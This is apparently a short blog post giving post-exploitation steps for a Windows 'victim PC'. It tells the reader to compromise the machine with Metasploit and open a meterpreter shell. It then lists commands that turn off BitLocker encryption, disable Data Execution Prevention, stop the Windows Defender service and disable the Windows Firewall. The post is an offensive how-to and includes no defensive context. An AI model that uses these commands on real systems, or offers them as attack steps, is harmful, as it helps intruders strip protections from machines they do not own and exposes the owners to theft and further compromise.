First Hack the Victim PC
Using Metasploit
Once you got the meterpreter session
use ‘shell ‘command to get command prompt of the target
How to Check Status and disable bitlocker
From Microsoft BitLocker
Drive Encryption allows you to encrypt all data stored on the Windows operating
system volume and configured data volumes, and by using a Trusted Platform Module?
:- manage-bde -status C:
(If Bit locker is enable use following command)
:- manage-bde -off C:
How to OFF Date Execution Prevention (DEP)
From Microsoft Data Execution Prevention (DEP) is a security
feature that can help prevent damage to your computer from viruses and other
security threats. Harmful programs can try to attack Windows by attempting to
run (also known as execute) code from system memory locations reserved for
Windows and other authorized programs. These types of attacks can harm your
programs and files.
:- bcdedit.exe /set {current} nx AlwaysOff
How to Stop Windows Defender Service
Windows Defender is your
first line of defense against spyware and other unwanted software.
:- net stop WinDefend
How to Disable Windows Firewall
Windows Firewall can help protect your PC from hackers and
malicious software. In Windows 7
:- netsh firewall set opmode disable
No comments:
Post a Comment